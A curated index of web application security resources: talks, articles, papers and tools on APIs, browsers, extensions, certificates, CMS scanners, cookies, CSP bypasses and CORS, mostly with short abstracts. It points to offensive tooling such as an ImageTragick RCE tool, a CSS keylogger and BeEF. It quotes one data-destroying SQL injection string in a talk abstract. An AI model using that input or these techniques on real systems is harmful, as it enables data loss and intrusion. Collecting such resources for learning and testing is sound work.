- General
- Purposely Vulnerable Web Apps -> See 'Building a Lab' page.
- Standards & Technologies
- Attacks & Techniques
- 101
- APIs
- (Web) Browsers
- Backend X(Image/PDF/etc) Processing
- Cascading Style Sheets
- Certificates & Cert Transparency
- CMS Specific
- Cookies & Tokens
- Content Security Policy(CSP)
- Cross-Origin Resource Sharing (CORS)
- Cookies
- Document Object Model(DOM)
- Edge Side Include
- Electron
- Encoding
- FIDO2
- File System Access API
- Flash/SWF
- GhostScript
- GraphQL
- HTML
- Hyper Text Transport Protocol (HTTP)
- Imagemagick
- Java & Associated
- JavaScript
- JavaScript Frameworks
- .NET-based Frameworks
- Python-based Frameworks
- JSON
- JSON Web Tokens
- MIME Sniffing
- NodeJS
- OAuth
- Parsers
- PASETO
- PHP
- Protocol Buffers
- Robots.txt
- RPC-related
- Ruby
- SAML
- Same-Origin-Policy
- Security Assertion Markup Language (SAML)
- Service Workers
- Site Isolation
- SubResource Integrity
- Secure Sockets Layer/Transport Layer Security
- SSL/TLS
- Single Sign-On
- Streams
- Unicode
- Uniform Resource Identifier/Locator(URIs/URLs)
- Web Application Firewalls(WAFs)
- Web Assembly
- WebAuthentication
- WebBluetooth
- Web Hooks
- WebNFC
- Web Proxies & Middleware
- WebRTC
- Web Servers
- WebSockets
- Web Storage
- WebUSB
- Tactics
- Guides & Methodologies
- General Reconnaissance - Fix toc section
- Attacks
- Abuse of Functionality
- Backend File Parsing/Processing - fix
- Brute Force/Fuzzing/Directory Discovery
- Cache-based Attacks - Fix
- CSV injection
- ClickJacking
- Cross Protocol Scripting/Request Attack
- Cross Site Content Hijacking
- Cross-Site History Manipulation (XSHM)
- Cross-Site-Request Forgery
- Cross-Site-Scripting (XSS)
- Cascading StyleSheets Injection
- Cross Site WebSocket Hijacking
- Data Structure Attacks
- Edge Side Include Injection
- Embedded Malicious Code
- Exploitation of Authentication
- Execution after Redirect
- File Upload Testing
- (Attacking) Frameworks
- Fuzzing
- HTML Smuggling
- HTTP Request Smuggling
- Image-based Exploitation AKA Exploiting Polyglot features of File standards
- IDN Homograph Attacks - Font Deception
- Insecure Direct Object Reference
- Injection Based Attacks
- LFI & RFI
- Log4J
- Logic Flaws
- OS Command Injection
- JNDI
- Password Bruteforcing
- Path Confusion Attacks
- Path Traversal Attacks
- Prototype Pollution Attack
- Reflected File Download
- Relative Path Overwrite
- Serialization Attacks
- Site Imaging
- (NO)SQL Injection
- Server Side Request Forgery
- Server Side Include
- Server Side Template Injection
- Subdomain Hijack
- Tabnabbing
- Timing-based Attacks/Data Race Attacks
- TLS Redirection (and Virtual Host Confusion)
- Typosquatting
- Web Cache Poisoning Attack
- Web Shells
- XML-based Attacks
- Miscellaneous
- Application Specific/Vendor Specific
- To Do
  - backlog
  - TLS
  - HTTP2/3
  - XSS
  - XSSI
  - XXE
- 101
- Things to Know
- OWASP Application Security Verification Standard
- "The primary aim of the OWASP Application Security Verification Standard (ASVS) Project is to normalize the range in the coverage and level of rigor available in the market when it comes to performing Web application security verification using a commercially-workable open standard. The standard provides a basis for testing application technical security controls, as well as any technical security controls in the environment, that are relied on to protect against vulnerabilities such as Cross-Site Scripting (XSS) and SQL injection. This standard can be used to establish a level of confidence in the security of Web applications."
- OWASP Top Ten Project
- The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list.
- The Website Obesity Crisis
- XSS, CSRF, CSP, JWT, WTF? IDK ¯\_(ツ)_/¯ - Dominik Kundel(JSConf Iceland 2018)
- Robert'); DROP TABLE Students;-- The little Bobby Tables embodies the classical fear of SQL injection when building web applications. However, SQL injections are just one aspect of the things we need to worry about when building web applications. With the recent popularity of Angular, React and other Single Page Application frameworks, we have more logic executing on the front-end, creating new problems and making you forget about others. In this talk you will learn about XSS, CSRF, CORS, JWT, HTTPS, SPAs, REST APIs and other weird abbreviations, and how to protect yourself and your users from the new generation of Bobby Tables.
- Articles
- Things to Know
- Browsers
- Browser-2020
- Things you can do with a browser in 2020
- It's like, did no one read 'The Tangled Web: A Guide to Securing Modern Web Applications'? Or did they, and their take away was, 'Man, what a bunch of great ideas! Blinking text with no user control? Woah. I'm so on this.'.
- My point is that it is 2020, and there is no equivalent to NoScript or UBlock Origin in any major browser. Despite this, I can have picture in picture video chats, while also connecting by bluetooth and USB, devices to the browser and having each tab color coded, along with the browser knowing my power level of my device, all according to standards.
- It's 2020, still no equivalent of NoScript or UBlock Origin available by default in any of the major browsers.
- Yet, I can share files with others, using a contextual menu depending on installed applications, or I can give my browser access to my insecure USB and Bluetooth devices, while it makes sure my battery isn't dead from the power consumption while the containing tabs for each webapp are properly color coded. 🤔
- Google released a paper the day after I made this comment. I stand by my comment.
- Oh, the Places You'll Go! Finding Our Way Back from the Web Platform's Ill-conceived Jaunts - Artur Janc, Mike West(2020)
- In this paper, we start from a scattered list of concrete grievances about the web platform based on informal discussions among browser and web security engineers. After reviewing the details of these issues, we work towards a model of the root causes of the problems, categorizing them based on the type of risk they introduce to the platform. We then identify possible solutions for each class of issues, dividing them by the most effective approach to address it. In the end, we arrive at a general blueprint for backing out of these dead ends. We propose a three-pronged approach which includes changing web browser defaults, creating a slew of features for web authors to opt out of dangerous behaviors, and adding new security primitives. We then show how this approach can be practically applied to address each of the individual problems, providing a conceptual framework for solving unsafe legacy web platform behaviors.
- How Browsers Work: Behind the scenes of modern web browsers - Tali Garsiel, Paul Irish(2011)
- Authentication
- Articles
* A Dive Into Web Application Authentication - James Chiapetta(2022)
* Auth-Boss
* 🔒 Become an Auth Boss. Learn about different authentication methodologies on the web.
- Talks/Presentations
- Authorization
- Articles
- Session Management
- Cheat Sheets
- See 'Cheats.md' for cheatsheets
- Tools
- 101
- OWASP API Security Project
- WebSocket API Standards
- API Throwdown: RPC vs REST vs GraphQL - Nate Barbettini(Iterate 2018)
- Choosing an API design style can be downright daunting. The RPC vs. REST debate has raged for years, and now there's a new kid on the block: GraphQL. Which is right for your application? I'll demystify these API styles in clear terms and help you decide how to design your API.
- A brief look at the evolution of interface protocols leading to modern APIs - Luis Augusto Weir(2019)
- Reference
- White House Web API Standards
- This document provides guidelines and examples for White House Web APIs, encouraging consistency, maintainability, and best practices across applications. White House APIs aim to balance a truly RESTful API interface with a positive developer experience (DX).
- OpenAPI
- The OpenAPI Specification
- The OpenAPI Specification (OAS) defines a standard, programming language-agnostic interface description for REST APIs, which allows both humans and computers to discover and understand the capabilities of a service without requiring access to source code, additional documentation, or inspection of network traffic. When properly defined via OpenAPI, a consumer can understand and interact with the remote service with a minimal amount of implementation logic. Similar to what interface descriptions have done for lower-level programming, the OpenAPI Specification removes guesswork in calling a service.
- What Is OpenAPI?
- Kiota
- "Kiota is a command line tool for generating an API client to call any OpenAPI described API you are interested in. The goal is to eliminate the need to take a dependency on a different API SDK for every API that you need to call. Kiota API clients provide a strongly typed experience with all the features you expect from a high quality API SDK, but without having to learn a new library for every HTTP API."
- Building
- Securing
- General
- OWASP API Security Project
- OWASP API Security Top 10
- API Security Checklist
- Checklist of the most important security countermeasures when designing, testing, and releasing your API
- API Maturity model
- Code Patterns for API Authorization: Designing for Security - Tanner Prynn(2020)
- "This post describes some of the most common design patterns for authorization checking in web application code. Comparisons are made between the design patterns to help understand when each pattern makes sense as well as the drawbacks of the pattern. For developers and architects, this post helps you to understand what the different code patterns look like and how to choose between them. For security auditors, the most effective approaches to auditing authorization controls are explained based on which pattern the code uses."
- Black and Blue APIs: Attacker's and Defender's View of API Vulnerabilities - Matt Tesauro(2022)
- Talks & Presentations
- BOLA, IDOR, MA, BFLA. Welcome to the OWASP API Top 10! - Adam Fisher(BSidesSLC 2020)
- API Security: Tokens, Flows and the Big Bad Wolf - Ingy Youssef(BSidesColumbus 2019)
- OAuth Flows, OpenID Connect, tokens, nonces, gateways & all the fun API stuff. Well, there's always a big bad wolf, and APIs have lots of targets. Digital Transformations are rolling out more and more APIs, yesterday is different than today, the security model is changing, but in what ways? We need to secure APIs and be enablers of change and lock out the big bad wolf.
- General
- Testing
- General
- Security testing guide for JSON / REST APIs #1/3 - Ivan Novikov
- Simplifying API Pentesting With Swagger Files - David Yesland
- Exploring Service APIs Through Test Automation - Amber Race(2020)
- API-Security-Empire
- How to Hack APIs in 2021 - Hakluke, Farah Hawa(2021)
- MindAPI
- "Organize your API security assessment by using MindAPI. It's free and open for community collaboration."
- How to Detect the Programming Language of an API - Dana Epp(2022)
- An API Security Testing Checklist… with a twist - Dana Epp(2023)
- 5 simple questions to make your API pentest more successful - Dana Epp(2023)
- How I fuzz and hack APIs? - Inderjeet Singh(2023) Testing of
- Talks/Presentations
- Fundamentals of Hacking Web API's - Charles Shirer
- Penetration testing Web API's can be difficult without an effective approach, so Charles Shirer is here to provide you with a few tips and tricks! Charles breaks down the fundamentals of hacking Web API's and the methodology that he has used during his career to perform successful and effective Web API penetration tests over the years.
- API hacking for the Actually Pretty Inexperienced hacker with Katie Paxton-Fear(OWASP DevSlop)
- API Security: Tokens, Flows and the Big Bad Wolf - Ingy Youssef(BSidesColumbus 2019)
- OAuth Flows, OpenID Connect, tokens, nonces, gateways & all the fun API stuff. Well, there's always a big bad wolf, and APIs have lots of targets. Digital Transformations are rolling out more and more APIs, yesterday is different than today, the security model is changing, but in what ways? We need to secure APIs and be enablers of change and lock out the big bad wolf.
- Hacking APIs:Workshop - Corey Ball(2022)
- Postman
- Insomnia
- Insomnia - Kong
- Insomnia is a cross-platform REST client, built on top of Electron.
- Getting Started API Penetration Testing with Insomnia - Mic Whitehorn-Gillam(2020)
- General
- Talks/Presentations/Videos
- Tools
- restler-fuzzer
- "RESTler is the first stateful REST API fuzzing tool for automatically testing cloud services through their REST APIs and finding security and reliability bugs in these services."
- Fuzzapi
- Fuzzapi is a Rails application which uses API_Fuzzer and provides a UI for the gem.
- API-fuzzer
- An API fuzzer that fuzzes request attributes using common pentesting techniques and lists the vulnerabilities found.
- Automatic API Attack Tool - Imperva
- "Imperva's customizable API attack tool takes an API specification as an input, and generates and runs attacks that are based on it as an output. The tool is able to parse an API specification and create fuzzing attack scenarios based on what is defined in the API specification. Each endpoint is injected with cleverly generated values within the boundaries defined by the specification, and outside of it, the appropriate requests are sent and their success or failure are reported in a detailed manner. You may also extend it to run various security attack vectors, such as illegal resource access, XSS, SQLi and RFI, that are targeted at the existing endpoints, or even at non-existing ones. No human intervention is needed. Simply run the tool and get the results."
- GraphQL
- See GraphQL section below.
- REST
- 101
- Talks/Presentations/Videos
- Introduction to RESTful APIs with Chris Wahl
- Cracking and fixing REST services - Bill Sempf - Converge 2015
- REST, or Representational State Transfer, just refers to the protocol with which the whole Web works. No big. We are used to using REST with a browser, but there is more to it - we can write programs with REST. The problem is that writing properties and functions using the web's transfer protocol open them up to all of the security weaknesses of the web, and we know there are a few of those. Finding those bugs is just half of the battle - fixing them is a whole other story. You'll need the details, and you'll get them here.
- Deconstructing REST Security by David Blevins(DevoxxUSA2017)
- With an aggressive distaste for fancy terminology, this session delves into OAuth 2.0 as it pertains to REST and shows how it falls into two camps: stateful and stateless. The presentation also details a competing Amazon-style approach called HTTP Signatures and digs into the architectural differences of all three, with a heavy focus on the wire, showing actual HTTP messages and enough detail to have you thinking, “I could write this myself.”
- Attacking
- Tools
- Astra
- REST API penetration testing is complex due to continuous changes in existing APIs and newly added APIs. Astra can be used by security engineers or developers as an integral part of their process, so they can detect and patch vulnerabilities early in the development cycle. Astra can automatically detect and test login & logout (Authentication API), so it's easy for anyone to integrate it into a CI/CD pipeline. Astra can take an API collection as input, so it can also be used for testing APIs in standalone mode.
- Susanoo
- Susanoo is a REST API security testing framework.
- restler-fuzzer
- "RESTler is the first stateful REST API fuzzing tool for automatically testing cloud services through their REST APIs and finding security and reliability bugs in these services."
- Learning/Reference
- 101
- Microservices
- Service-Oriented-Architecture
- The S stands for Simple
- Satire (only it's not) of a conversation about SOAP
- 101
- Talks & Presentations
- Tools
- WS-Attacker
- WS-Attacker is a modular framework for web services penetration testing. It is developed by the Chair of Network and Data Security, Ruhr University Bochum (http://nds.rub.de/ ) and the Hackmanit GmbH (http://hackmanit.de/).
- Damn Vulnerable Web Services dvws
- Damn Vulnerable Web Services is an insecure web application with multiple vulnerable web service components that can be used to learn real world web service vulnerabilities.
- WS-Attacks.org
- WS-Attacks.org is not a new web service standard by the OASIS Group or W3C; instead it presents the flaws of today's web service standards and implementations in regard to web service security! WS-Attacks.org aims at delivering the most comprehensive enumeration of all known web service attacks.
- Learning/Reference
- Reference
- Tools
- Postman - chrome plugin
- restclient - Firefox addon
- Astra
- REST API penetration testing is complex due to continuous changes in existing APIs and newly added APIs. Astra can be used by security engineers or developers as an integral part of their process, so they can detect and patch vulnerabilities early in the development cycle. Astra can automatically detect and test login & logout (Authentication API), so it's easy for anyone to integrate it into a CI/CD pipeline. Astra can take an API collection as input, so it can also be used for testing APIs in standalone mode.
- mitmproxy2swagger
- A tool for automatically converting mitmproxy captures to OpenAPI 3.0 specifications. This means that you can automatically reverse-engineer REST APIs by just running the apps and capturing the traffic.
- REST-Attacker
- REST-Attacker is an automated penetration testing framework for APIs following the REST architecture style. The tool's focus is on streamlining the analysis of generic REST API implementations by completely automating the testing process - including test generation, access control handling, and report generation - with minimal configuration effort. Additionally, REST-Attacker is designed to be flexible and extensible with support for both large-scale testing and fine-grained analysis.
- Images
- 101
- Articles/Blogposts/Writeups
- ImageTragick/ImageMagick Is On Fire: CVE-2016-3714
- Playing with ImageTragick like it's 2016 - Alexis Danizan, Clément Amic(2021)
- ImageTragick: A Tragick Image Conversion Tale - INE
- ImageMagick - Shell injection via PDF password - Alex Infuhr(2020)
- ImageMagick: The hidden vulnerability behind your online images - Bryan Gonzalez(2022)
- Papers
- Presentations/Talks/Videos
- Tools
- imagetragick
- A tool to exploit imagetragick vulnerability to gain remote code execution.
- CVE-2022-44268 Arbitrary File Read PoC - PNG generator
- This is a proof of concept of the ImageMagick bug discovered by https://www.metabaseq.com/imagemagick-zero-days/
- PDFs
- 101
- Articles/Blogposts/Writeups
- Papers
- Presentations/Talks/Videos
- Tools
- Browsers
- 101
- Articles/Blogposts/Writeups
- Papers
- Self-Exfiltration: The Dangers of Browser-Enforced Information Flow Control
- Abstract: Since the early days of Netscape, browser vendors and web security researchers have restricted out-going data based on its destination. The security argument accompanying these mechanisms is that they prevent sensitive user data from being sent to the attacker’s domain. However, in this paper, we show that regulating web information flow based on its destination server is an inherently flawed security practice. It is vulnerable to self-exfiltration attacks, where an adversary stashes stolen information in the database of a whitelisted site, then later independently connects to the whitelisted site to retrieve the information. We describe eight existing browser security mechanisms that are vulnerable to these “self-exfiltration” attacks. Furthermore, we discovered at least one exfiltration channel for each of the Alexa top 100 websites. None of the existing information flow control mechanisms we surveyed are sufficient to protect data from being leaked to the attacker. Our goal is to prevent browser vendors and researchers from falling into this trap by designing more systems that are vulnerable to self-exfiltration.
- How do we Stop Spilling the Beans Across Origins? - A primer on web attacks via cross-origin information leaks and speculative execution - aaj@google.com, mkwst@google.com
- Presentations/Talks/Videos
- Browser as Botnet - Brannon Dorsey - Radical Networks 2017
- When surfing the web, browsers download and execute arbitrary JavaScript code they receive from websites they visit. What if high-traffic websites served obfuscated code that secretly borrowed clock cycles from their client’s web browser as a means of distributed computing? In this talk I present research on the topic of using web browsers as zero-configuration, trojan-less botnets. The presentation includes a brief history of botnets, followed by an overview of techniques to build and deploy command-and-control botnet clients that run in-browser.
- Tools
- Chrome Specific
- Chromium Sandbox
- Sandbox leverages the OS-provided security to allow code execution that cannot make persistent changes to the computer or access information that is confidential. The architecture and exact assurances that the sandbox provides are dependent on the operating system. This document covers the Windows implementation as well as the general design.
- Chromium Cross-Origin Read Blocking (CORB)
- Chromium Sidechannel Threat Model: Post-Spectre Threat Model Re-Think(2018)
- Security analysis of the <portal> element - Michal Bentkowski
- Firefox Specific
- Safari Specific
- Browser Extensions
- Articles/Blogposts/Writeups
- Attacking Browser Extensions
- Botnet in the Browser: Understanding Threats Caused by Malicious Browser Extensions
- An in-depth look into Malicious Browser Extensions(2014)
- Game of Chromes: Owning the Web with Zombie Chrome Extensions - DEF CON 25 - Tomer Cohen
- Chrome-botnet
- Malware in the browser: how you might get hacked by a Chrome extension(2016) - Maxime Kjaer
- I Sold a Chrome Extension but it was a bad decision - Amit Agarwal
- Detecting Installed Extensions (Edge)(2017) - brokenbrowser.com
- Finding Browser Extensions To Hunt Evil!(2016) - Brad Antoniewicz
- Sparse Bruteforce Addon Detection(2011) - James Kettle
- Intro to Chrome addons hacking: fingerprinting(2012) - kotowicz
- No Place Like Chrome - xorrior
- Democratizing Chrome Extension Security - Duo Security(2018)
- Kicking the Rims – A Guide for Securely Writing and Auditing Chrome Extensions - Matthew Bryant(2018)
- Anatomy of a basic extension - Wladimir Palant(2022)
- Yes, fun browser extensions can have vulnerabilities too! - Wladimir Palant(2021)
- Hidden in plain sight: the risks of browser extensions - multilogin.com(2021)
- Talks & Presentations
- Offensive Browser Extension Development - Michael Weber(Derbycon 7)
- For the past few years, malware authors have abused the extension development functionality of Chrome and Firefox. More often than not, these extensions are abused for standard crimeware activities, such as ad click fraud, cryptocurrency mining, or stealing banking credentials. But this is only scratching the surface of what is possible if the appropriate browser APIs are abused. Extensions can act as a foothold into a target's internal network, provided a single user can be convinced to click two buttons. As a post-exploitation mechanism, extensions can be side-loaded with the ability to read and write files to disk. These actions will all be performed from the browser process(es) and likely go undetected by conventional endpoint protection solutions. This talk will discuss the creation, deployment, and usage of malicious browser extensions so that other red teamers can add this attack vector to their toolkit.
- Chrome Specific
- Firefox Specific
- Papers
- Malicious Browser Extensions at Scale: Bridging the Observability Gap between Web Site and Browser - Louis F. DeKoven, Stefan Savage, Geoffrey M. Voelker, Nektarios Leontiadis
- We present a methodology whereby users exhibiting suspicious online behaviors are scanned (with permission) to identify the set of extensions in their browser, and those extensions are in turn labelled based on the threat indicators they contain. We have employed this methodology at Facebook for six weeks, identifying more than 1700 lexically distinct malicious extensions. We use this labelling to drive user device clean-up efforts as well to report to antimalware and browser vendors.
- Tools
- extension_finder
- Python and PowerShell utilities for finding installed browser extensions, plug-ins and add-ons
- CSS Keylogger
- Chrome extension and Express server that exploits keylogging abilities of CSS.
- tarnish
- tarnish is a static-analysis tool to aid researchers in security reviews of Chrome extensions.
- CRXcavator
- CRXcavator automatically scans the entire Chrome Web Store every 3 hours and produces a quantified risk score for each Chrome Extension based on several factors. These factors include permissions, inclusion of vulnerable third party javascript libraries, weak content security policies, missing details from the Chrome Web Store description, and more. Organizations can use this tool to assess the Chrome Extensions they have installed and to move towards implementing explicit allow (whitelisting) for their organization.
- Articles/Blogposts/Writeups
- Exploiting
- Smashing The Browser: From Vulnerability Discovery To Exploit
- Goes from introducing a fuzzer to producing an IE11 0day
- The Birth of a Complete IE11 Exploit Under the New Exploit Mitigations
- BeEF Browser Exploitation Framework
- BeEF
- Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
- Browsers Gone Wild - Angelo Prado & Xiaoran Wang - BHAsia2015
- In this talk, we will demonstrate and unveil the latest developments on browser specific weaknesses including creative new mechanisms to compromise confidentiality, successfully perform login and history detection, serve mixed content, deliver malicious ghost binaries without a C&C server, exploit cache/timing side channels to extract secrets from third-party domains, and leverage new HTML5 features to carry out more stealthy attacks. This is a practical presentation with live demos that will challenge your knowledge of the Same Origin Policy and push the limits of what is possible with today's web clients.
- 101
- Certificates
- Certificate Revocation
- Certificate Pinning
- Certificate Transparency
- 101
- Certificate.transparency.dev
- Certificate Transparency - Mozilla
- "Certificate Transparency is an open framework designed to protect against and monitor for certificate mis-issuances. It's defined in RFC 9162. With certificate transparency, newly-issued certificates are 'logged' to publicly-run, often independent CT logs — which maintain an append-only, cryptographically-assured record of issued TLS certificates."
- Certificate Transparency- Digicert
- Talks/Presentations/Videos
- HTTP Strict Transport Security
- Domain Validation
- Let's Attack Let's Encrypt - Haya Shulman
- Slides
- In this work we show that two central design issues of the distributed domain validation of Let's Encrypt make it vulnerable to downgrade attacks...
- Tools
- CTFR
- Do you miss the AXFR technique? This tool gets the subdomains of an HTTPS website in a few seconds. How does it work? CTFR uses neither a dictionary attack nor brute force; it simply queries Certificate Transparency logs.
- Certificate Transparency Subdomains
- An hourly updated list of subdomains gathered from certificate transparency logs.
- CertSpotter
- Cert Spotter is a Certificate Transparency log monitor from SSLMate that alerts you when an SSL/TLS certificate is issued for one of your domains. Cert Spotter is easier than other open source CT monitors, since it does not require a database. It's also more robust, since it uses a special certificate parser that ensures it won't miss certificates.
- CRTScan
- Scan subdomains from certificate transparency logs
- ctexposer
- An OSINT tool that discovers sub-domains by searching Certificate Transparency logs
- Agnostic
- 101
- Articles/Blogposts/Writeups
- Papers
- Tools
- WhatWeb
- WhatWeb identifies websites. Its goal is to answer the question, "What is that Website?". WhatWeb recognises web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb has over 1500 plugins, each to recognise something different. WhatWeb also identifies version numbers, email addresses, account IDs, web framework modules, SQL errors, and more.
- w3af
- w3af: web application attack and audit framework, the open source web vulnerability scanner.
- Adobe Experience Manager
- 101
- Articles/Blogposts/Writeups
- Papers
- Tools
- aem-hacker
- Tools to identify vulnerable Adobe Experience Manager (AEM) webapps.
- ColdFusion
- 101
- Articles/Blogposts/Writeups
- Papers
- Tools
- Drupal
- 101
- Articles/Blogposts/Writeups
- Papers
- Tools
- Drupal Attack Scripts
- Set of brute force scripts and Checklist
- Droopescan
- A plugin-based scanner that aids security researchers in identifying issues with several CMSs, mainly Drupal & Silverstripe.
- Joomla
- 101
- Articles/Blogposts/Writeups
- Papers
- Tools
- JoomScan
- Joomla! is probably the most widely-used CMS out there due to its flexibility, user-friendliness and extensibility, to name a few. So, watching its vulnerabilities and adding them to the Joomla scanner's knowledge base is an ongoing activity. It helps web developers and web masters identify possible security weaknesses on their deployed Joomla! sites. No other web security scanner is dedicated to only one CMS.
- JScanner
- Analyze target Joomla! installation using several different techniques.
- JoomlaVS
- JoomlaVS is a Ruby application that can help automate assessing how vulnerable a Joomla installation is to exploitation. It supports basic fingerprinting and can scan for vulnerabilities in components, modules and templates as well as vulnerabilities that exist within Joomla itself.
- Sharepoint
- 101
- Articles/Blogposts/Writeups
- Papers
- Tools
- Sparty - Sharepoint/Frontpage Auditing Tool
- Sparty is an open source tool written in Python to audit web applications built on the SharePoint and FrontPage architecture. The motivation behind this tool is to provide an easy and robust way to scrutinize the security configurations of SharePoint and FrontPage based web applications. Due to the complex nature of this web administration software, a simple and efficient tool is needed that gathers information, checks access permissions, dumps critical information from default files and performs automated exploitation if security risks are identified. A number of automated scanners fall short of this, and Sparty is a solution to that.
- Wordpress
- 101
- Articles/Blogposts/Writeups
- Papers
- Tools
- 101
- HTTP cookie - Wikipedia
- Using HTTP cookies - MDN(Mozilla)
- All About Cookies.org
- Cookiedatabase
- "On Cookiedatabase.org you can consult information about cookies, Local Storage, pixels and other tracking technologies. You can also read the Data Passports we created about the services and organizations that create or use these technologies."
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
- Baking Your Anomalous Cookies - Jim Allee(NolaCon2019)
- I hacked Fortnite! Actually it was a vulnerable cookie found on several domains owned by Epic Games that allowed me to hijack traffic of users of their websites, steal session tokens and of course, BeEF hook em'. I will describe my journey from creating a custom cookie fuzzing tool (Anomalous Cookie) to help identify vulnerable cookies, to creating a framework for 'Cookie Baking'. Cookie Baking is the technique of creating or modifying a cookie in a users' local Cookie Jar (this includes stuffing with malicious payloads, affiliate tags, fuzz-strings and more). I will also provide insight into the Bug Bounty process, how Google responded to my request for them to protect local cookies at rest, and how I created WHID-Injected Cookies! ;)
- Got Cookies? Exploiting Vulnerabilities in Cookie Based Authentication - Harsh Bothra(Mayhem2021 RTV)
- Abstract: Cookies are a widely used way to enable authentication in many of the applications out there. Over time, there have been a lot of security implications in Cookie-Based Authentication and new methods such as token-based authentication have entered the picture. Although many modern applications are adopting Token-Based authentication, Cookie-Based Authentication is still alive and can be observed in the wild. In this talk, we will look at various attack scenarios that can be exploited in the wild if the application is using cookies for authentication, tracking, personalization, or some value reflections.
- Papers
- Tools
- CookieMonster
- Blogpost
- 🍪 CookieMonster helps you detect and abuse vulnerable implementations of stateless sessions.
- JWTs
- 101
- Articles
- Talks
- Tools
- MyJWT
- A cli for cracking, testing vulnerabilities on Json Web Token(JWT)
- jwt-fuzzer
- jwt-fuzzer is a simple command line tool that creates multiple, potentially invalid, strings from an initial JSON Web Token.
- PASETO
- SameSite
- Strict-Transport-Security
- Strict-Transport-Security - MDN - https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Strict-Transport-Security
- 101
- Articles/Papers/Talks/Writeups
- Content Security Policy - An Introduction - Scott Helme(2014)
- GitHub's post-CSP journey - githubengineering
- CVE-2018-5175: Universal CSP strict-dynamic bypass in Firefox - Masato Kinugawa
- CSP and SVG - c0nrad
- "The tl;dr is make sure object-src is ‘none’ if you’re not using it. Using this “attack” you can reflect SVGs to get execution even in a CSP controlled environment. This is just another recipe to add to your books for bypassing CSP (insecure directives, JSONP, base offset, encoding)."
- Host a web app on Twitter in a single Tweet - @mikeptweet(2017)
- Content Security Policy (CSP) Bypasses - ghostlulz
- How To Bypass CSP By Hiding JavaScript In A PNG Image - @Menin_theMiddle
- "TL;DR - Using HTML Canvas you can hide any JavaScript code (or an entire library) into a PNG image by converting each source code character into a pixel. The image can then be uploaded onto a trusted website like Twitter or Google (usually whitelisted by CSP) and then loaded as a remote image in a HTML document. Finally, by using the canvas getImageData method, it's possible to extract the "hidden JavaScript" from the image and execute it. Sometimes this could lead to a Content-Security-Policy bypass making an attacker able to include an entire and external JavaScript library."
- Content-Security-Policy (CSP) Bypass Techniques - Bhavesh Thakur(2020)
- Hunting nonce-based CSP bypasses with dynamic analysis - Gareth Hayes(2021)
- Bypass CSP? No problem - Okhonko Philipp(2021)
- Tools
- JSONBee
- A ready to use JSONP endpoints to help bypass content security policy of different websites.
- Miscellaneous
- 101
- Cross-Origin Resource Sharing (CORS) - Mozilla Dev Docs
- CORS Findings: Another Way to Comprehend - Ryan Leese
- Same Origin Policy - dev.mozilla
- Same Origin Policy - W3C
- Cross-Origin Resource Sharing (CORS) - dev.mozilla
- Cross-Origin Resource Sharing - w3.org
- This document defines a mechanism to enable client-side cross-origin requests. Specifications that enable an API to make cross-origin requests to resources can use the algorithms defined by this specification. If such an API is used on http://example.org resources, a resource on http://hello-world.example can opt in using the mechanism described by this specification (e.g., specifying Access-Control-Allow-Origin: http://example.org as response header), which would allow that resource to be fetched cross-origin from http://example.org.
- Private Network Access(aka CORS-RFC1918) - W3C(2022)
- This document specifies modifications to Fetch and HTML which are intended to mitigate the risks associated with unintentional exposure of devices and servers on a client’s internal network to the web at large.
- Articles/Blogposts/Writeups
- JSON API's Are Automatically Protected Against CSRF, And Google Almost Took It Away.
- Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy
- Arbitrary Reflected Origin - Evan J(2016)
- Do You Really Know CORS? - Grzegorz Mirek
- 3 Ways to Exploit Misconfigured Cross-Origin Resource Sharing (CORS) - Pavan Kumar J(2018)
- Three C-Words of Web App Security: Part 1 – CORS - Mic Whitehorn-Gillam(2018)
- CORS Findings: Another Way to Comprehend - Ryan Leese(2018)
- Same-Origin Policy: From birth until today - Alex Nikolova(2019)
- "In this blog post I will talk about Cross-Origin Resource Sharing (CORS) between sites on different domains, and how the web browser’s Same Origin Policy is meant to facilitate CORS in a safe way. I will present data on cross-origin behaviour of various versions of four major browsers, dating back to 2004. I will also talk about recent security bugs (CVE-2018-18511, CVE-2019-5814 and CVE-2019-9797) I discovered in the latest versions of Firefox, Chrome and Opera which allows stealing sensitive images via Cross-Site Request Forgery (CSRF)."
- Cross-Origin Resource Sharing (CORS) - Ghostlulz
- How do we Stop Spilling the Beans Across Origins? A primer on web attacks via cross-origin information leaks and speculative execution - aaj@google.com, mkwst@google.com(2022)
- Exploiting CORS Misconfigurations - attack ships on fire(2022)
- Cross-Origin Resource Sharing (CORS) | Complete Guide - Rana Khalil(2022)
- "In this video, we cover the theory behind Cross-Origin Resource Sharing (CORS) vulnerabilities, how to find these types of vulnerabilities from both a white box and black box perspective, how to exploit them and how to prevent them."
- Cross Origin Resource Sharing - CORS - secure-cookie.io
- Presentations/Talks/Videos
- Exploiting CORS Misconfigurations For Bitcoins And Bounties by James Kettle(AppSecEU 2017)
- Cross-Origin Resource Sharing (CORS) is a mechanism for relaxing the Same Origin Policy to enable communication between websites via browsers. It's already widely understood that certain CORS configurations are dangerous. In this presentation, I'll skim over the old knowledge then coax out and share with you an array of under-appreciated but dangerous subtleties and implications buried in the CORS specification. I'll illustrate each of these with recent attacks on real websites, showing how I could have used them to steal bitcoins from two different exchanges, partially bypass Google's use of HTTPS, and requisition API keys from numerous others. I'll also show how CORS blunders can provide an invaluable link in crafting exploit chains to pivot across protocols, exploit the unexploitable via server and client-side cache poisoning, and even escalate certain open redirects into vulnerabilities that are actually notable.
- Blogpost
- To CORS! The cause of, and solution to, your SPA problems! - Tim Tomes, Kevin Cody
